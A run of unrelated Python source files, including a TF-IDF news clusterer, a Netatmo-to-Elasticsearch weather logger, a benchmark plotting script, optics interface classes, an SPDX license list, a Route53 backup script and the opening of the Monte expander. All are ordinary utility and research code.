"""Calculate and store term frequency vector.
Args:
index (list[str]): Word index.
Returns:
list[str]: Updated word index.
"""
new_index = index.copy()
tokens = self.preprocess_text()
unique_words = set(tokens)
text_freq_dict = {word: 0 for word in unique_words}
for word in tokens:
text_freq_dict[word] += 1
if new_index is None:
new_index = list(unique_words)
else:
addition = [word for word in unique_words if word not in new_index]
new_index += addition
tf = []
for word in new_index:
tf.append(text_freq_dict[word] if word in unique_words else 0)
self.vector = np.array(tf) / len(tokens)
return new_index
def pad_tf_vector(self, padding_len: int):
"""Pad the term frequency vector with zeros.
Args:
padding_len (int): Length vector will be extended by.
"""
self.vector = np.pad(self.vector, (0, padding_len))
def preprocess_text(self) -> list[str]:
"""Turn text into tokens without stopwords and punctuation.
Returns:
list[str]: List of tokens.
"""
text = self.article.title + ' ' + self.article.description
text = text.translate(str.maketrans('', '', string.punctuation))
stop_words = set(stopwords.words('english'))
tokens = word_tokenize(text)
filtered_tokens = []
for token in tokens:
if token.lower not in stop_words:
filtered_tokens.append(token)
return filtered_tokens
class Cluster:
"""Cluster of NLPArticle objects.
Attributes:
nlp_articles (list[NLPArticle]): Stored NLPArticle objects
self.vector (numpy.ndarray): Average of term frequency vectors in
NLPArticle objects.
"""
def __init__(self, nlp_articles: list[NLPArticle], event_id: str = None):
self.nlp_articles = nlp_articles
self.vector = None
self.event_id = event_id
def set_tf_vector(self, index: list[str]):
"""Calculate and store average term frequency vector.
Args:
index (list[str]): Word index.
"""
new_index = index
self.vector = np.zeros(len(new_index))
for nlp_article in self.nlp_articles:
self.vector += nlp_article.vector
self.vector /= len(self.nlp_articles)
def pad_tf_vector(self, padding_len: int):
"""Pad the term frequency vector with zeros.
Args:
padding_len (int): Length vector will be extended by.
"""
self.vector = np.pad(self.vector, (0, padding_len))
def get_event(self) -> Event:
"""Gets event representation.
Returns:
Event: Event representation.
"""
articles = []
for nlp_article in self.nlp_articles:
articles.append(nlp_article.article)
return Event(articles, self.event_id)
class Clusterer:
"""Clusters Articles into Events.
Attributes:
cluster_threshold (float): Cosine similarity from 0 to 1 for clustering
strictness.
active_threshold (int): Number of days until old events are inactive.
clusters (list[Cluster]): Stored Cluster objects.
inactive_events (list[Events]): Event objects that won't be
considered in clustering.
index (list[str]): Word index.
"""
def __init__(self, cluster_threshold: float = 0.3,
active_threshold: int = 2):
self.cluster_threshold = cluster_threshold
self.active_threshold = active_threshold
self.clusters = []
self.inactive_events = []
self.index = []
def add_events(self, events: list[Event]):
"""Set event objects as clusters and label old events inactive.
Args:
events (list[Event]): Article objects.
"""
today = datetime.today()
for event in events:
nlp_articles = []
for article in event.articles:
nlp_articles.append(NLPArticle(article))
self.clusters.append(Cluster(nlp_articles, event.event_id))
for cluster in self.clusters:
for nlp_article in cluster.nlp_articles:
self.index = nlp_article.set_tf_vector(self.index)
index_len = len(self.index)
for nlp_article in cluster.nlp_articles:
padding_len = index_len - len(nlp_article.vector)
nlp_article.pad_tf_vector(padding_len)
cluster.set_tf_vector(self.index)
def add_articles(self, articles: list[Article]):
"""Add Article objects to cluster.
Args:
articles (list[Article]): Article objects.
"""
articles = sorted(articles, key=lambda x: x.published_time)
nlp_articles = [NLPArticle(article) for article in articles]
for nlp_article in nlp_articles:
self.index = nlp_article.set_tf_vector(self.index)
index_len = len(self.index)
for nlp_article in nlp_articles:
padding_len = index_len - len(nlp_article.vector)
nlp_article.pad_tf_vector(padding_len)
for cluster in self.clusters:
padding_len = index_len - len(cluster.vector)
for cluster_nlp_article in cluster.nlp_articles:
cluster_nlp_article.pad_tf_vector(padding_len)
cluster.pad_tf_vector(padding_len)
inv_doc_freq = self.get_inv_doc_freq(nlp_articles)
for nlp_article in nlp_articles:
closest_dist = 0
closest_cluster = None
for cluster in self.clusters.copy():
article_time = datetime.strptime(
nlp_article.article.published_time,
'%Y-%m-%dT%H:%M:%SZ'
)
cluster_article = max(
cluster.nlp_articles,
key=lambda x: x.article.published_time
).article
cluster_article_time = datetime.strptime(
cluster_article.published_time,
'%Y-%m-%dT%H:%M:%SZ'
)
days_difference = (article_time - cluster_article_time).days
if days_difference > self.active_threshold:
event = cluster.get_event()
event.active = False
self.inactive_events.append(event)
self.clusters.remove(cluster)
continue
new_dist = vector_similarity(
np.multiply(nlp_article.vector, inv_doc_freq),
np.multiply(cluster.vector, inv_doc_freq))
if new_dist > self.cluster_threshold and new_dist > closest_dist:
closest_dist = new_dist
closest_cluster = cluster
if closest_cluster is None:
new_cluster = Cluster([nlp_article])
self.clusters.append(new_cluster)
new_cluster.set_tf_vector(self.index)
else:
closest_cluster.nlp_articles.append(nlp_article)
closest_cluster.set_tf_vector(self.index)
def get_events(self) -> list[Event]:
"""Get Event representation.
Returns:
list[Event]: Event representation.
"""
active_events = [cluster.get_event() for cluster in self.clusters]
return active_events + self.inactive_events
def get_inv_doc_freq(self, nlp_articles: list[NLPArticle]) -> np.ndarray:
"""Calculate inverse document frequency.
Args:
nlp_articles (list[NLPArticle]): Extra NLPArticles to use in
calculations.
"""
vector_len = len(self.index)
doc_freq = np.zeros(vector_len)
for nlp_article in nlp_articles:
doc_freq += np.ceil(nlp_article.vector)
for cluster in self.clusters:
for nlp_article in cluster.nlp_articles:
doc_freq += np.ceil(nlp_article.vector)
doc_count = len(nlp_articles)
for cluster in self.clusters:
doc_count += len(cluster.nlp_articles)
inv_doc_freq = np.zeros(vector_len)
for i in range(len(doc_freq)):
num = doc_freq[i]
if num != 0:
num = math.log((1 / num) * doc_count)
inv_doc_freq[i] = num
return inv_doc_freq
def vector_similarity(a: np.ndarray, b: np.ndarray) -> float:
"""Calculate cosine similarity between vectors.
Args:
a (numpy.ndarray): First numpy vector.
b (numpy.ndarray): Second numpy vector.
Returns:
float: Cosine similarity.
"""
return (a @ b) / (np.linalg.norm(a) * np.linalg.norm(b))
|
#!/usr/bin/env python3
# encoding=utf-8
from logging import exception
import signal
import argparse
import configparser
from time import sleep
from os import environ
from pathlib import Path
from datetime import datetime
from xmlrpc.client import Boolean
import pyatmo
import eland as ed
from elasticsearch import Elasticsearch
import pandas as pd
def parse_config(config_file=None):
_config = configparser.ConfigParser(interpolation=None)
if config_file is None:
config_file = Path("config.ini")
if config_file.exists():
_config.read(config_file)
return _config
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", dest="config", type=str, nargs=1, required=False)
return parser.parse_args()
def shutdown(_signal):
global running
running = False
def process_station(es, index_name, station, station_name, backup_dir):
# Convert from C to F
station['Temperature'] = station['Temperature'] * 1.8 + 32
if 'min_temp' in station:
station['min_temp'] = station['min_temp'] * 1.8 + 32
if 'max_temp' in station:
station['max_temp'] = station['max_temp'] * 1.8 + 32
station['Humidity'] = station['Humidity'] / 100
if 'Pressure' in station:
station['Pressure'] = float(station['Pressure'])
if 'AbsolutePressure' in station:
station['AbsolutePressure'] = float(station['AbsolutePressure'])
if 'min_temp' in station:
station['min_temp'] = float(station['min_temp'])
if 'max_temp' in station:
station['max_temp'] = float(station['max_temp'])
# Convert Timestamps
station['When'] = pd.Timestamp.utcfromtimestamp(station['When'])
if 'date_min_temp' in station:
station['date_min_temp'] = pd.Timestamp.utcfromtimestamp(station['date_min_temp'])
if 'date_max_temp' in station:
station['date_max_temp'] = pd.Timestamp.utcfromtimestamp(station['date_max_temp'])
station_data = pd.json_normalize(station)
station_data = station_data.rename(columns={
"Temperature": "temperature",
'CO2' : 'co2',
'Humidity' : 'humidity',
'Noise' : 'noise',
'Pressure' : 'pressure',
'AbsolutePressure' : 'absolute_pressure',
'min_temp' : 'min_tempature',
'max_temp' : 'max_tempature',
'date_max_temp' : 'date_max_tempature',
'date_min_temp' : 'date_min_tempature',
'temp_trend' : 'tempature_trend',
'When' : '@timestamp'
})
station_data["station_name"] = station_name
# append data frame to CSV file
station_data.to_csv(backup_dir+station_name+'.csv', mode='a', index=False, header=False)
# Push Results to Elastic
df = ed.pandas_to_eland(
pd_df=station_data,
es_client=es,
es_dest_index=index_name,
es_if_exists="append",
es_type_overrides={
'@timestamp' : 'date'
},
use_pandas_index_for_es_ids=False,
es_refresh=True
)
if __name__ == "__main__":
running = True
interval = None
authorization = None
client_id = None
client_secret = None
netatmo_username = None
netatmo_password = None
elastic_url = None
elastic_username = None
elastic_password = None
elastic_verify_certs = True
args = parse_args()
config = parse_config(args.config)
if environ.get("TERM"):
signal.signal(signal.SIGTERM, shutdown)
signal.signal(signal.SIGINT, shutdown)
if "global" in config:
interval = int(config["global"]["interval"])
if "netatmo" in config:
client_id = config["netatmo"]["client_id"]
client_secret = config["netatmo"]["client_secret"]
netatmo_username = config["netatmo"]["netatmo_username"]
netatmo_password = config["netatmo"]["netatmo_password"]
netatmo_station_id = config["netatmo"]["netatmo_station_id"]
if "elastic" in config:
elastic_url = config["elastic"]["elastic_url"]
elastic_username = config["elastic"]["elastic_username"]
elastic_password = config["elastic"]["elastic_password"]
ca_certs_dir = config["elastic"]["ca_certs_dir"]
if environ.get("NETATMO_CLIENT_ID"):
client_id = environ.get("NETATMO_CLIENT_ID")
if environ.get("NETATMO_CLIENT_SECRET"):
client_secret = environ.get("NETATMO_CLIENT_SECRET")
if environ.get("NETATMO_USERNAME"):
netatmo_username = environ.get("NETATMO_USERNAME")
if environ.get("NETATMO_PASSWORD"):
netatmo_password = environ.get("NETATMO_PASSWORD")
if environ.get("NETATMO_STATION_ID"):
netatmo_station_id = environ.get("NETATMO_STATION_ID")
if environ.get("ELASTIC_URL"):
elastic_url = environ.get("ELASTIC_URL")
if environ.get("ELASTIC_USERNAME"):
elastic_username = environ.get("ELASTIC_USERNAME")
if environ.get("NETATMO_STATION_ID"):
elastic_password = environ.get("ELASTIC_PASSWORD")
if environ.get("CA_CERTS"):
ca_certs_dir = environ.get("CA_CERTS")
if interval is None:
interval = 300 # interval in seconds; default are 5 Minutes
elif environ.get("INTERVAL"):
interval = int(environ.get("INTERVAL"))
if environ.get("BACKUP_DIR"):
backup_dir = environ.get("BACKUP_DIR")
else:
backup_dir = config["global"]["backup_dir"]
# ElasticSeach Connection
es = Elasticsearch(
elastic_url,
basic_auth=(elastic_username, elastic_password),
verify_certs=False, # currently using self signed certs
ca_certs=ca_certs_dir
)
while running:
authorization = pyatmo.ClientAuth(
client_id=client_id,
client_secret=client_secret,
username=netatmo_username,
password=<PASSWORD>,
scope="read_station"
)
try:
weather_data = pyatmo.WeatherStationData(authorization)
weather_data.update()
weather_current_data = weather_data.get_last_data(netatmo_station_id)
# 0 - Primary Station
# 1 - Outside Module
stations = list(weather_current_data.keys())
primary_station = weather_current_data[stations[0]]
outside_station = weather_current_data[stations[1]]
process_station(es,"netatmo_indoor", primary_station, 'Basement', backup_dir)
process_station(es,"netatmo_outdoor", outside_station, 'Backyard', backup_dir)
except Exception as e:
print("exception {}".format(e))
# Print and wait the interval to try again
sleep(interval) |
import json
import math
import pandas as pd
import sys
import git
from pathlib import Path
from inspect import cleandoc
from plotly.subplots import make_subplots
import plotly.express as px
import plotly.graph_objects as go
import plotly
from pretty_html_table import build_table
# plot colors
pal = px.colors.qualitative.Plotly
color_sequence = ["#BBB", "#777", "#111", pal[9], pal[4], pal[6], pal[1], pal[0], "#58a2c4", pal[5], pal[2], pal[7], pal[8], pal[3]]
# plot labels
plot_labels = dict(
cpu_time_per_key='ns per key',
dataset_elem_count='dataset size',
elem_magnitude='dataset size',
hashfn_bits_per_key='bits per key',
throughput='keys per second')
file = "results.json" if len(sys.argv) < 2 else sys.argv[1]
with open(file) as data_file:
data = json.load(data_file)
# convert json results to dataframe
df = pd.json_normalize(data, 'benchmarks')
# augment additional computed columns
df["hashfn"] = df["label"].apply(lambda x : x.split(":")[0])
df["dataset"] = df["label"].apply(lambda x : x.split(":")[1])
df["probe_distribution"] = df["label"].apply(lambda x : x.split(":")[2] if len(x.split(":")) > 2 else "-")
# order data (important for legend & colors)
def order(x):
x = x.lower()
if x == "donothinghash":
return 1
if x == "rankhash":
return 2
if x == "recsplit_leaf12_bucket9":
return 3
if x == "compacttrie":
return 4
if x == "fastsuccincttrie":
return 5
if x == "simplehollowtrie":
return 6
if x == "hollowtrie":
return 7
if x == "mwhc":
return 8
if x == "compressedmwhc":
return 9
if x == "compactedmwhc":
return 10
if x == "rmirank":
return 11
if x == "compressedrmirank":
return 12
if x == "learnedlinear":
return 13
if x == "adaptivelearnedmmphf":
return 14
if x == "mapomphf":
return 15
return 0
df["order"] = df.apply(lambda x : order(x["hashfn"]), axis=1)
df = df.sort_values(by=["order", "dataset_elem_count"])
# augment plotting datasets
def magnitude(x):
l = math.log(x, 10)
rem = round(x/pow(10, l), 2)
exp = int(round(l, 0))
#return f'${rem} \cdot 10^{{{exp}}}$'
return f'{rem}e-{exp}'
df["elem_magnitude"] = df.apply(lambda x : magnitude(x["dataset_elem_count"]), axis=1)
# prepare datasets for plotting & augment dataset specific columns
lt_df = df[df["name"].str.lower().str.contains("lookuptime")].copy(deep=True)
bt_df = df[df["name"].str.lower().str.contains("buildtime")].copy(deep=True)
lt_df["cpu_time_per_key"] = lt_df['cpu_time']
lt_df["throughput"] = lt_df.apply(lambda x : 10**9 / x["cpu_time_per_key"], axis=1)
bt_df["cpu_time_per_key"] = bt_df.apply(lambda x : x["cpu_time"] / x["dataset_elem_count"], axis=1)
bt_df["throughput"] = bt_df.apply(lambda x : 10**9 / x["cpu_time_per_key"], axis=1)
bt_df["sorted"] = bt_df.apply(lambda x : x["name"].lower().startswith("presorted"), axis=1)
# ensure export output folder exists
results_path = "docs" if len(sys.argv) < 3 else sys.argv[2]
Path(results_path).mkdir(parents=True, exist_ok=True)
def convert_to_html(fig):
#fig.show()
return fig.to_html(full_html=False, include_plotlyjs=False)
def plot_lookup_times():
name = "lookup_time"
fig = px.line(
lt_df,
x="dataset_elem_count",
y="cpu_time_per_key",
color="hashfn",
facet_row="probe_distribution",
facet_col="dataset",
category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
markers=True,
log_x=True,
labels=plot_labels,
color_discrete_sequence=color_sequence,
height=600,
title="Lookup - nanoseconds per key"
)
return convert_to_html(fig)
def plot_hashfn_bits_per_key():
name = "bits_per_key"
fig = px.line(
lt_df,
x="dataset_elem_count",
y="hashfn_bits_per_key",
color="hashfn",
facet_col="dataset",
facet_col_wrap=3,
category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
log_x=True,
markers=True,
labels=plot_labels,
color_discrete_sequence=color_sequence,
height=600,
title="Space - total bits per key"
)
fig.update_yaxes(range=[-50, 700])
return convert_to_html(fig)
def plot_pareto_lookup_space():
filtered = lt_df[
(lt_df["dataset_elem_count"] > 9 * 10**7)
]
name = "lookup_time"
fig = px.scatter(
filtered,
x="cpu_time_per_key",
y="hashfn_bits_per_key",
color="hashfn",
facet_row="probe_distribution",
facet_col="dataset",
category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
#markers=True,
#log_x=True,
labels=plot_labels,
color_discrete_sequence=color_sequence,
height=600,
title="Pareto - lookup (ns) vs space (bits/key)"
)
return convert_to_html(fig)
def plot_build_time():
# copy to enable value changes
f_bt_df = bt_df.copy(deep=True)
#f_bt_df = f_bt_df[f_bt_df["dataset_elem_count"].isin([10**6, 10**8])]
f_bt_df = f_bt_df[f_bt_df["dataset_elem_count"] > 9 * 10**7]
name = "build_time"
fig = px.bar(
f_bt_df,
x="elem_magnitude",
y="throughput",
color="hashfn",
barmode="group",
facet_col="dataset",
facet_row="sorted",
category_orders={"dataset": ["seq", "gap_10", "uniform", "normal", "wiki", "osm", "fb"]},
labels=plot_labels,
color_discrete_sequence=color_sequence,
height=600,
title="Build - throughput in keys per second"
)
fig.update_traces(
patch={'visible': 'legendonly'},
selector=lambda go : go.legendgroup.lower() in ["donothinghash"])
return convert_to_html(fig)
def plot_raw_data():
raw_data = df.sort_values(by=["name"])
raw_data = raw_data.rename({"cpu_time": "ns", 'hashfn': 'function', "probe_distribution": "probe distribution", 'dataset_elem_count': 'keys', 'hashfn_bits_per_key': 'bits per key'}, axis='columns')
raw_data = raw_data[["name", "function", "probe distribution", "dataset", "keys", "bits per key", "ns"]]
raw_data["ns"] = raw_data.apply(lambda x : str(int(float(x["ns"]))), axis=1)
raw_data["keys"] = raw_data.apply(lambda x : str(int(x["keys"])), axis=1)
return cleandoc(f"""
<div style="width: 100%; height: 500px; overflow-y: scroll;">
{build_table(raw_data, 'blue_light', width="100%")}
</div>
""")
with open(f'{results_path}/index.html', 'w') as readme:
readme.write(cleandoc(f"""
<!doctype html>
<html>
<head>
<script src="https://cdn.plot.ly/plotly-latest.min.js"></script>
</head>
<body style="display: grid; grid-template-columns: repeat(auto-fit, minmax(1200px, 1fr))">
<embed src="functions.html" style="width: 100%; height: 500px;"/>
{plot_lookup_times()}
{plot_hashfn_bits_per_key()}
{plot_pareto_lookup_space()}
{plot_build_time()}
<div style="margin: 15px">
<h3 style="color: rgb(42, 63, 95)">Raw Data</h2>
{plot_raw_data()}
</div>
</body>
</html>
"""))
|
from typing import Dict, Sequence, Tuple
from enum import Enum
import numpy as np
import otk.functions
import scipy.interpolate
from otk.functions import make_perpendicular
from .. import v4hb
from .. import functions
from .. import ri
class Directions(Enum):
REFLECTED = 0
TRANSMITTED = 1
class InterfaceMode:
def __init__(self, direction: int, matrix: np.ndarray, vector: np.ndarray, n: np.ndarray):
"""
Args:
direction: Either REFLECTED or TRANSMITTED.
matrix: Projection matrix.
vector: Outgoing k vector.
n: Outgoing refractive index.
"""
self.direction = Directions(direction)
self.matrix = np.asarray(matrix)
assert self.matrix.shape[-2:] == (4, 4)
self.vector = np.asarray(vector)
assert self.vector.shape[-1] == 4
# Row space of matrix should be orthogonal to outgoing k vector.
assert np.allclose(v4hb.dot(self.matrix, self.vector[..., None, :]), 0, atol=1e-7)
# This checks that the shapes are consistent.
self.shape = np.broadcast(self.matrix, self.vector[..., None]).shape
self.n = n
def __repr__(self):
return 'InterfaceMode(matrix=%r, vector=%r, n=%r)'%(self.matrix, self.vector, self.n)
class Interface:
def calc_modes(self, point: np.ndarray, normal: np.ndarray, lamb: float, vector: np.ndarray, n: np.ndarray) -> Dict[
str, InterfaceMode]:
"""
Args:
point: ...x4 array in surface local coordinates.
normal: ...x4 array in surface local coordinates.
lamb: wavelength
vector: ...x4 array of normalized incident k vectors in local coordinates.
"""
raise NotImplementedError()
def calc_outer_product(vector1, vector2, amplitude):
"""Output[...,i,j] = vector1[...,i]*amplitude*vector2[...,j]."""
vector1 = np.asarray(vector1)
vector2 = np.asarray(vector2)
amplitude = np.atleast_1d(amplitude)
assert amplitude.shape[-1] == 1
return vector1[..., :, None]*amplitude[..., None]*vector2[..., None, :]
def calc_matrix(incident_vectors, deflected_vectors, amplitudes):
return sum(calc_outer_product(incident_vector, deflected_vector, amplitude) for incident_vector, deflected_vector, amplitude in
zip(incident_vectors, deflected_vectors, amplitudes))
class Mirror(Interface):
def calc_modes(self, point: np.ndarray, normal: np.ndarray, lamb: float, incident_vector: np.ndarray,
n: np.ndarray) -> Dict:
reflected_vector = otk.functions.reflect_vector(incident_vector, normal)
s_pol_vector = v4hb.cross(normal, incident_vector)
incident_p_pol_vector = v4hb.cross(incident_vector, s_pol_vector)
reflected_p_pol_vector = v4hb.cross(reflected_vector, s_pol_vector)
matrix = calc_matrix((incident_p_pol_vector, s_pol_vector), (reflected_p_pol_vector, s_pol_vector),
np.asarray((1, 1)))
mode = InterfaceMode(Directions.REFLECTED, matrix, reflected_vector, n)
modes = dict(reflected=mode)
return modes
class IsotropicMediaInterface(Interface):
def __init__(self, n1, n2, reflects: bool = True, transmits: bool = True):
self.n1 = n1
self.n2 = n2
self.reflects = reflects
self.transmits = transmits
def calc_amplitudes(self, n1, n2, cos_theta1, lamb) -> Tuple[Tuple]:
"""Returns amplitudes ((rp, rs), (tp, ts))."""
raise NotImplementedError()
def calc_modes(self, point: np.ndarray, normal: np.ndarray, lamb: float, incident_vector: np.ndarray,
n: np.ndarray) -> Dict:
"""
Args:
point:
normal:
lamb:
incident_vector:
Returns:
Mapping of (Outgoing, Polarization) pairs to InterfaceMode objects.
"""
n1 = self.n1(lamb)
n2 = self.n2(lamb)
cos_theta1 = v4hb.dot(normal, incident_vector)
if 0:
na = np.choose(cos_theta1 < 0, (n1, n2))
nb = np.choose(cos_theta1 < 0, (n2, n1))
else:
assert np.all(cos_theta1>=0) or np.all(cos_theta1<=0)
cos_theta1 = cos_theta1.ravel()[0]
if cos_theta1>0:
na, nb = n1, n2
else:
na, nb = n2, n1
cos_theta1 = abs(cos_theta1)
refracted_vector = otk.functions.refract_vector(incident_vector, normal, nb/na)*na/nb
reflected_vector = otk.functions.reflect_vector(incident_vector, normal)
# Generate unit vector perpendicular to normal and incident.
s_pol_vector = make_perpendicular(normal, incident_vector)
incident_p_pol_vector = v4hb.cross(incident_vector, s_pol_vector)
refracted_p_pol_vector = v4hb.cross(refracted_vector, s_pol_vector)
reflected_p_pol_vector = v4hb.cross(reflected_vector, s_pol_vector)
amplitudes = self.calc_amplitudes(na, nb, cos_theta1, lamb)
modes = {}
if self.reflects:
matrix = calc_matrix((incident_p_pol_vector, s_pol_vector), (reflected_p_pol_vector, s_pol_vector),
amplitudes[0])
modes['reflected'] = InterfaceMode(Directions.REFLECTED, matrix, reflected_vector, na)
if self.transmits:
matrix = calc_matrix((incident_p_pol_vector, s_pol_vector), (refracted_p_pol_vector, s_pol_vector),
amplitudes[1])
modes['transmitted'] = InterfaceMode(Directions.TRANSMITTED, matrix, refracted_vector, nb)
return modes
class PerfectRefractor(IsotropicMediaInterface):
def __init__(self, n1, n2):
IsotropicMediaInterface.__init__(self, n1, n2, False, True)
def calc_amplitudes(self, n1, n2, cos_theta1, lamb):
return ((0, 0), (1, 1))
class FresnelInterface(IsotropicMediaInterface):
def calc_amplitudes(self, n1, nb, cos_theta1, lamb):
return functions.calc_fresnel_coefficients(n1, nb, cos_theta1)
def __repr__(self):
return 'FresnelInterface(n1=%r, n2=%r)'%(self.n1, self.n2)
def flip(self):
return FresnelInterface(self.n2, self.n1)
class SampledCoating(IsotropicMediaInterface):
"""Symmetric - amplitudes are the same from both sides."""
def __init__(self, n1: ri.Index, n2: ri.Index, lambs: Sequence, thetas: Sequence, amplitudes: np.ndarray):
"""
Args:
lambs: Sampled wavelengths.
thetas: Sampled angles.
amplitudes: Array with dimensions (Outgoing, Polarization, wavelength, angle).
"""
IsotropicMediaInterface.__init__(self, n1, n2)
self.lambs = np.asarray(lambs)
assert self.lambs.ndim == 1
self.thetas = np.asarray(thetas)
assert self.thetas.ndim == 1
self.amplitudes = amplitudes
assert self.amplitudes.shape == (2, 2, len(self.lambs), len(self.thetas))
def __repr__(self):
return 'SampledCoating(n1=%r, n2=%r, lambs=%r, thetas=%r, amplitudes=%r)'%(
self.n1, self.n2, self.lambs, self.thetas, self.amplitudes)
def calc_amplitudes(self, n1, n2, cos_theta1, lamb):
results = []
theta1 = np.arccos(cos_theta1)
# Loop over reflected, transmitted.
for amplitudes in self.amplitudes:
results.append([])
# Loop over p, s.
for amplitude in zip(amplitudes):
# TODO switch to complex interpolation.
amplitude_lamb = scipy.interpolate.interp1d(self.lambs, amplitude, axis=0, copy=False)(lamb)
amplitude_lamb_theta = scipy.interpolate.interp1d(self.thetas, amplitude_lamb, axis=0, copy=False)(
theta1)
results[-1].append(amplitude_lamb_theta)
return results
|
"""common constants"""
import logging
log_format = "%(filename)s: %(message)s"
logging.basicConfig(format=log_format, level=logging.DEBUG)
LOGGER = logging.getLogger("haxo")
LOGGER.setLevel(logging.INFO)
SPDX = [
"GPL-1",
"GPL-2",
"GPL-2.0",
"GPL-3",
"GPL",
"AAL",
"AFL-3.0",
"AGPL-3.0",
"Apache-1.1",
"Apache-2.0",
"APL-1.0",
"APSL-2.0",
"Artistic-1.0",
"Artistic-2.0",
"Artistic",
"BSD-1-Clause",
"BSD-2-Clause",
"BSD-2-Clause-Patent",
"BSD-3-Clause",
"BSD-3-Clause-LBNL",
"BSD",
"BSL-1.0",
"CAL-1.0",
"CATOSL-1.1",
"CC0-1.0",
"CDDL-1.0",
"CECILL-2.1",
"CNRI-Python",
"CPAL-1.0",
"CPL-1.0",
"CUA-OPL-1.0",
"CVW",
"ECL-1.0",
"ECL-2.0",
"EFL-1.0",
"EFL-2.0",
"Entessa",
"EPL-1.0",
"EPL-2.0",
"EUDatagrid",
"EUPL-1.2",
"Fair",
"Frameworx-1.0",
"GFDL",
"GFDL-1.2",
"GFDL-1.3",
"HPND",
"IPA",
"IPL-1.0",
"ISC",
"LGPL-2",
"LGPL-2.1",
"LGPL-3",
"LGPL-3.0",
"LGPL",
"LiLiQ-P",
"LiLiQ-R",
"LiLiQ-R+",
"LPL-1.02",
"LPPL-1.3c",
"MirOS",
"MIT",
"Motosoto",
"MPL-1.0",
"MPL-1.1",
"MPL-2.0",
"MS-PL",
"Ms-RL",
"MS-RL",
"MulanPSL - 2.0",
"Multics",
"NASA-1.3",
"Naumen",
"NCSA",
"NGPL",
"Nokia Open Source License",
"NOSL",
"NPOSL-3.0",
"NTP",
"OCLC-2.0",
"ODbL",
"OFL-1.1",
"OGTSL",
"OLDAP-2.8",
"OSET-PL-2.1",
"OSL-1.0",
"OSL-2.1",
"OSL-3.0",
"PHP-3.0",
"Plan9",
"PostgreSQL",
"Python-2.0",
"PSF",
"QPL-1.0",
"RPL-1.1",
"RPL-1.5",
"RPSL-1.0",
"RSCPL",
"SimPL-2.0",
"SISSL",
"Sleepycat",
"SPL-1.0",
"UPL",
"VSL-1.0",
"W3C",
"Watcom-1.0",
"WXwindows",
"Xnet",
"YPL-1.1",
"Zimbra-1.3",
"Zlib",
"ZPL-2.0",
]
if __name__ == "__main__":
for license in SPDX:
print(license)
|
<filename>route53_s3_backup.py<gh_stars>1-10
import boto3
import time
import datetime
import json
import os
# Settings:
deployToS3Bucket = False
bucketName = "x"
# Init:
now = datetime.datetime.now()
today = now.strftime("%Y-%m-%d")
s3 = boto3.resource('s3')
route53 = boto3.client('route53')
route53FolderName = "route53"
fullFolderPath = route53FolderName + "/" + today
hostedZones = []
recordSets = {}
globalErrorList = []
def main():
getHostedZones()
getRecords()
writeRecordsToFile()
uploadRoute53DataFile()
def getHostedZones(nextMarker=""):
try:
print('Listing hosted zones .. ')
if nextMarker is not "":
response = route53.list_hosted_zones(Marker=nextMarker)
else:
response = route53.list_hosted_zones()
print('Hosted zone count: ', len(response['HostedZones']))
except Exception as x:
globalErrorList.append(str(x))
print(x)
for zone in response['HostedZones']:
hostedZones.append(zone)
time.sleep(2)
if bool(response['IsTruncated']):
getHostedZones(str(response['NextMarker']))
def getRecords(startRecordName="", passedInZoneId="", passedInZoneName=""):
print('Getting records for hosted zones .. ')
for zone in hostedZones:
try:
if startRecordName is not "":
print('Getting additional records for zoneid ', passedInZoneId)
response = route53.list_resource_record_sets(
HostedZoneId=passedInZoneId, StartRecordName=startRecordName)
print(response)
for record in response['ResourceRecordSets']:
recordSets[passedInZoneName].append(record)
print(len(recordSets[passedInZoneName]))
else:
print('Getting records for ' + str(zone['Name']))
response = route53.list_resource_record_sets(
HostedZoneId=zone['Id'])
if zone['Name'] not in recordSets:
recordSets[zone['Name']] = []
for record in response['ResourceRecordSets']:
recordSets[zone['Name']].append(record)
print('response record set count: ', len(response['ResourceRecordSets']))
time.sleep(2)
if response['IsTruncated'] == True:
print('Truncated response.. going back for more .. ')
getRecords(str(response['NextRecordName']), str(zone['Id']), str(zone['Name']))
if startRecordName is not "":
return
except Exception as x:
globalErrorList.append(str(x))
print(x)
def writeRecordsToFile():
print('Writing records to file ..')
cwd = './' + route53FolderName + '/' + today
if not os.path.isdir('./' + route53FolderName):
os.mkdir(route53FolderName)
if not os.path.isdir(cwd):
os.mkdir(cwd)
for zone in hostedZones:
fileName = cwd + '/' + zone['Name'] + 'json'
if os.path.isfile(fileName):
os.remove(fileName)
with open(fileName, 'a') as outputFile:
print(json.dumps(recordSets[zone['Name']]), file=outputFile)
def uploadRoute53DataFile():
if deployToS3Bucket is False:
return
print('Writing files to s3 bucket ..')
cwd = './' + route53FolderName + '/' + today
for zone in hostedZones:
fullFileName = cwd + '/' + zone['Name'] + 'json'
# Upload a new file
print('Writing ' + zone['Name'] + ' to bucket')
data = open(fullFileName, 'rb')
s3.Bucket(bucketName).put_object(Key=route53FolderName +
'/'+today+'/'+zone['Name']+'json', Body=data)
time.sleep(1)
main() |
<reponame>washort/monte<filename>monte/expander.py
from ometa.grammar import TreeTransformerGrammar
from ometa.runtime import TreeTransformerBase, ParseError
from terml.nodes import Tag, Term, termMaker as t
### XXX TODO: Create TemporaryExprs for variables generated by
### expansion. Replace all temps with nouns in a single pass at the
### end.
TRUE = t.NounExpr('true') #Term(Tag('true'), None, None, None)
FALSE = t.NounExpr('false') #Term(Tag('false'), None, None, None)
class ScopeSet(object):
def __init__(self, bits=()):
self.contents = list(bits)
def __sub__(self, other):
bits = self.contents[:]
for bit in other:
if bit in bits:
bits[bits.index(bit)] = bits[-1]
del bits[-1]
return ScopeSet(bits)
def __and__(self, other):
if len(self) > len(other):
big = self.contents
small = list(other)
else:
small = self.contents
big = list(other)
bits = []
for bit in small:
if bit in big:
bits.append(bit)
return ScopeSet(bits)
def __or__(self, other):
bits = list(other)
for bit in self.contents:
if bit not in bits:
bits.append(bit)
return ScopeSet(bits)
def getKeys(self):
return self.contents[:]
def __contains__(self, o):
return o in self.contents
def __iter__(self):
return iter(self.contents)
def __len__(self):
return len(self.contents)
def butNot(self, other):
bits = list(other)
return ScopeSet(x for x in self.contents if x not in bits)
class StaticScope(object):
def __init__(self, namesRead=None, namesSet=None, metaStateExprFlag=False,
defNames=None, varNames=None):
if namesRead is None:
